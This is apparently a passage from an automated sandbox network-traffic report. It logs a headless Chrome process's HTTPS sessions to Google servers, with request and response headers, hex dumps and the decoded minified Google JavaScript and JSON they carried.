                                                                                                                                                                                                                                                                                                                  Data Ascii: +)c[d]\u003da[d];return c}return[]};Kd\u003dfunction(a){return new _.Jd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Ld\u003dglobalThis.trustedTypes;_.Md\u003dclass{constructor(a){this.i\u003da}toString(){return this.i}};
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:10 UTC1390INData Raw: 6e 28 61 29 7b 69 66 28 24 64 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 62 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4d 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4d 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 61 65 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 63 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 64 28 63 5c 75 30 30 33 64 5c 22 64 6f 63 75 6d 65 6e 74 5c 22 69 6e 20 62 3f 62 2e 64 6f 63 75 6d 65 6e 74 3a
                                                                                                                                                                                                                                                                                                                  Data Ascii: n(a){if($d.test(a))return a};_.be\u003dfunction(a){if(a instanceof _.Md)if(a instanceof _.Md)a\u003da.i;else throw Error(\"F\");else a\u003d_.ae(a);return a};_.ce\u003dfunction(a,b\u003ddocument){let c,d;b\u003d(d\u003d(c\u003d\"document\"in b?b.document:
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:10 UTC1390INData Raw: 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 6f 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 45 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 63 6c 61 73 73 5c 22 3f 61 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30
                                                                                                                                                                                                                                                                                                                  Data Ascii: 3db||c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]||null));return a||null};\n_.oe\u003dfunction(a,b){_.Eb(b,function(c,d){d\u003d\u003d\"style\"?a.style.cssText\u003dc:d\u003d\u003d\"class\"?a.className\u003dc:d\u003d\u0
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:10 UTC1390INData Raw: 69 6f 6e 28 61 2c 62 29 7b 62 5c 75 30 30 33 64 53 74 72 69 6e 67 28 62 29 3b 61 2e 63 6f 6e 74 65 6e 74 54 79 70 65 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 6d 6c 5c 22 5c 75 30 30 32 36 5c 75 30 30 32 36 28 62 5c 75 30 30 33 64 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3b 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 62 29 7d 3b 5f 2e 75 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 6c 65 74 20 62 3b 66 6f 72 28 3b 62 5c 75 30 30 33 64 61 2e 66 69 72 73 74 43 68 69 6c 64 3b 29 61 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 62 29 7d 3b 5f 2e 76 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 5c 75 30 30 32 36 5c
                                                                                                                                                                                                                                                                                                                  Data Ascii: ion(a,b){b\u003dString(b);a.contentType\u003d\u003d\u003d\"application/xhtml+xml\"\u0026\u0026(b\u003db.toLowerCase());return a.createElement(b)};_.ue\u003dfunction(a){let b;for(;b\u003da.firstChild;)a.removeChild(b)};_.ve\u003dfunction(a){return a\u0026\


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  4192.168.2.449742216.58.206.684438092C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:10 UTC361OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:10 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Version: 712423320
                                                                                                                                                                                                                                                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                                  Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                                  Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                                  Date: Thu, 09 Jan 2025 09:59:10 GMT
                                                                                                                                                                                                                                                                                                                  Server: gws
                                                                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:10 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                                                                                  Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  5192.168.2.449748142.250.186.464438092C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:13 UTC741OUTGET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0 HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: apis.google.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                                  X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:13 UTC914INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                  Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access
                                                                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access"
                                                                                                                                                                                                                                                                                                                  Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]}
                                                                                                                                                                                                                                                                                                                  Content-Length: 117446
                                                                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                  Server: sffe
                                                                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                  Date: Thu, 09 Jan 2025 08:55:43 GMT
                                                                                                                                                                                                                                                                                                                  Expires: Fri, 09 Jan 2026 08:55:43 GMT
                                                                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                                  Last-Modified: Wed, 08 Jan 2025 15:23:05 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                  Age: 3810
                                                                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:13 UTC476INData Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 30 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 29 28 5b 5d 29 3b 0a 76 61 72 20 63 61 2c 64 61 2c 68 61 2c 6d 61 2c 78 61 2c 41 61 2c 42 61 3b 63 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20
                                                                                                                                                                                                                                                                                                                  Data Ascii: gapi.loaded_0(function(_){var window=this;_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([]);var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:13 UTC1390INData Raw: 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 5d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 63 3d 61 5b 62 5d 3b 69 66 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 72 6e 20 63 7d 74 68 72 6f 77 20 45 72 72 6f 72 28 22 61 22 29 3b 7d 3b 5f 2e
                                                                                                                                                                                                                                                                                                                  Data Ascii: ue;return a};ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:13 UTC1390INData Raw: 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 3d 61 3b 72 65 74 75 72 6e 20 6e 65 77 20 62 7d 2c 71 61 3b 69 66 28 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 71 61 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3b 65 6c 73 65 7b 76 61 72 20 72 61 3b 61 3a 7b 76 61 72 20 73 61 3d 7b 61 3a 21 30 7d 2c 77 61 3d 7b 7d 3b 74 72 79 7b 77 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 73 61 3b 72 61 3d 77 61 2e 61 3b 62 72 65 61 6b 20 61 7d 63 61 74 63 68 28 61 29 7b 7d 72 61 3d 21 31 7d 71 61 3d 72 61 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 62 3b 69 66 28 61 2e
                                                                                                                                                                                                                                                                                                                  Data Ascii: nction(a){var b=function(){};b.prototype=a;return new b},qa;if(typeof Object.setPrototypeOf=="function")qa=Object.setPrototypeOf;else{var ra;a:{var sa={a:!0},wa={};try{wa.__proto__=sa;ra=wa.a;break a}catch(a){}ra=!1}qa=ra?function(a,b){a.__proto__=b;if(a.
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:13 UTC1390INData Raw: 6f 72 28 3b 74 68 69 73 2e 46 66 26 26 74 68 69 73 2e 46 66 2e 6c 65 6e 67 74 68 3b 29 7b 76 61 72 20 68 3d 74 68 69 73 2e 46 66 3b 74 68 69 73 2e 46 66 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 6b 3d 30 3b 6b 3c 68 2e 6c 65 6e 67 74 68 3b 2b 2b 6b 29 7b 76 61 72 20 6c 3d 68 5b 6b 5d 3b 68 5b 6b 5d 3d 6e 75 6c 6c 3b 74 72 79 7b 6c 28 29 7d 63 61 74 63 68 28 6d 29 7b 74 68 69 73 2e 6d 71 28 6d 29 7d 7d 7d 74 68 69 73 2e 46 66 3d 6e 75 6c 6c 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 71 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 7a 50 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 68 3b 0a 7d 29 7d 3b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 45 61 3d 30 3b 74 68 69 73 2e 77 66 3d 76 6f 69 64 20 30 3b 74 68 69 73 2e
                                                                                                                                                                                                                                                                                                                  Data Ascii: or(;this.Ff&&this.Ff.length;){var h=this.Ff;this.Ff=[];for(var k=0;k<h.length;++k){var l=h[k];h[k]=null;try{l()}catch(m){this.mq(m)}}}this.Ff=null};b.prototype.mq=function(h){this.zP(function(){throw h;})};var e=function(h){this.Ea=0;this.wf=void 0;this.
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:13 UTC1390INData Raw: 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 74 79 70 65 6f 66 20 6b 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 68 3d 6e 65 77 20 6b 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 28 68 3d 5f 2e 6c 61 2e 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 43 75 73 74 6f 6d 45 76 65 6e 74 22 29 2c 68 2e 69 6e 69 74 43 75 73 74 6f 6d 45 76 65 6e 74 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 21 31 2c 21 30 2c 68 29 29 3b 68 2e 70 72 6f 6d 69 73 65 3d 74 68 69 73 3b 68 2e 72 65 61 73 6f 6e 3d 74 68 69 73 2e 77 66 3b 72 65 74 75 72 6e 20 6c 28 68 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65
                                                                                                                                                                                                                                                                                                                  Data Ascii: "unhandledrejection",{cancelable:!0}):typeof k==="function"?h=new k("unhandledrejection",{cancelable:!0}):(h=_.la.document.createEvent("CustomEvent"),h.initCustomEvent("unhandledrejection",!1,!0,h));h.promise=this;h.reason=this.wf;return l(h)};e.prototype
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:13 UTC1390INData Raw: 6e 65 29 7d 29 7d 3b 72 65 74 75 72 6e 20 65 7d 29 3b 76 61 72 20 43 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 54 68 65 20 27 74 68 69 73 27 20 76 61 6c 75 65 20 66 6f 72 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 6e 75 6c 6c 20 6f 72 20 75 6e 64 65 66 69 6e 65 64 22 29 3b 69 66 28 62 20 69 6e 73 74 61 6e 63 65 6f 66 20 52 65 67 45 78 70 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 46 69 72 73 74 20 61 72 67 75 6d 65 6e 74 20 74 6f 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 61 20 72 65 67 75 6c 61 72
                                                                                                                                                                                                                                                                                                                  Data Ascii: ne)})};return e});var Ca=function(a,b,c){if(a==null)throw new TypeError("The 'this' value for String.prototype."+c+" must not be null or undefined");if(b instanceof RegExp)throw new TypeError("First argument to String.prototype."+c+" must not be a regular
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:13 UTC1390INData Raw: 69 64 64 65 6e 5f 22 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3b 65 28 22 66 72 65 65 7a 65 22 29 3b 65 28 22 70 72 65 76 65 6e 74 45 78 74 65 6e 73 69 6f 6e 73 22 29 3b 65 28 22 73 65 61 6c 22 29 3b 76 61 72 20 68 3d 30 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 74 68 69 73 2e 46 61 3d 28 68 2b 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 6c 29 7b 6c 3d 5f 2e 79 61 28 6c 29 3b 66 6f 72 28 76 61 72 20 6d 3b 21 28 6d 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6d 3d 6d 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45 72 72
                                                                                                                                                                                                                                                                                                                  Data Ascii: idden_"+Math.random();e("freeze");e("preventExtensions");e("seal");var h=0,k=function(l){this.Fa=(h+=Math.random()+1).toString();if(l){l=_.ya(l);for(var m;!(m=l.next()).done;)m=m.value,this.set(m[0],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw Err
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:13 UTC1390INData Raw: 69 73 5b 31 5d 2e 53 6b 3d 6d 2e 5a 65 2c 74 68 69 73 2e 73 69 7a 65 2b 2b 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 6c 65 74 65 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 6b 3d 64 28 74 68 69 73 2c 6b 29 3b 72 65 74 75 72 6e 20 6b 2e 5a 65 26 26 6b 2e 6c 69 73 74 3f 28 6b 2e 6c 69 73 74 2e 73 70 6c 69 63 65 28 6b 2e 69 6e 64 65 78 2c 31 29 2c 6b 2e 6c 69 73 74 2e 6c 65 6e 67 74 68 7c 7c 64 65 6c 65 74 65 20 74 68 69 73 5b 30 5d 5b 6b 2e 69 64 5d 2c 6b 2e 5a 65 2e 53 6b 2e 6e 65 78 74 3d 6b 2e 5a 65 2e 6e 65 78 74 2c 6b 2e 5a 65 2e 6e 65 78 74 2e 53 6b 3d 0a 6b 2e 5a 65 2e 53 6b 2c 6b 2e 5a 65 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 69 7a 65 2d 2d 2c 21 30 29 3a 21 31 7d 3b 63 2e 70 72 6f 74 6f 74 79 70
                                                                                                                                                                                                                                                                                                                  Data Ascii: is[1].Sk=m.Ze,this.size++);return this};c.prototype.delete=function(k){k=d(this,k);return k.Ze&&k.list?(k.list.splice(k.index,1),k.list.length||delete this[0][k.id],k.Ze.Sk.next=k.Ze.next,k.Ze.next.Sk=k.Ze.Sk,k.Ze.head=null,this.size--,!0):!1};c.prototyp
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:13 UTC1390INData Raw: 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 74 79 70 65 6f 66 20 61 21 3d 22 66 75 6e 63 74 69 6f 6e 22 7c 7c 21 61 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 63 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 64 3d 6e 65 77 20 61 28 5f 2e 79 61 28 5b 63 5d 29 29 3b 69 66 28 21 64 2e 68 61 73 28 63 29 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 63 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 7b 78 3a 34 7d 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 32 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 64 2e 65 6e 74 72 69 65 73 28 29 2c 66 3d 65 2e 6e 65 78
                                                                                                                                                                                                                                                                                                                  Data Ascii: ion(){if(!a||typeof a!="function"||!a.prototype.entries||typeof Object.seal!="function")return!1;try{var c=Object.seal({x:4}),d=new a(_.ya([c]));if(!d.has(c)||d.size!=1||d.add(c)!=d||d.size!=1||d.add({x:4})!=d||d.size!=2)return!1;var e=d.entries(),f=e.nex
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:13 UTC1390INData Raw: 79 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 61 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 5b 62 2c 63 5d 7d 29 7d 7d 29 3b 0a 6d 61 28 22 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 6b 65 79 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 61 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 62 7d 29 7d 7d 29 3b 6d 61 28 22 67 6c 6f 62 61 6c 54 68 69 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 7c 7c 5f 2e 6c 61 7d 29 3b 6d 61 28 22 53 74 72
                                                                                                                                                                                                                                                                                                                  Data Ascii: y.prototype.entries",function(a){return a?a:function(){return Fa(this,function(b,c){return[b,c]})}});ma("Array.prototype.keys",function(a){return a?a:function(){return Fa(this,function(b){return b})}});ma("globalThis",function(a){return a||_.la});ma("Str


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  6192.168.2.449753142.250.185.2384438092C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:14 UTC734OUTPOST /log?format=json&hasfast=true HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: play.google.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Content-Length: 913
                                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded;charset=UTF-8
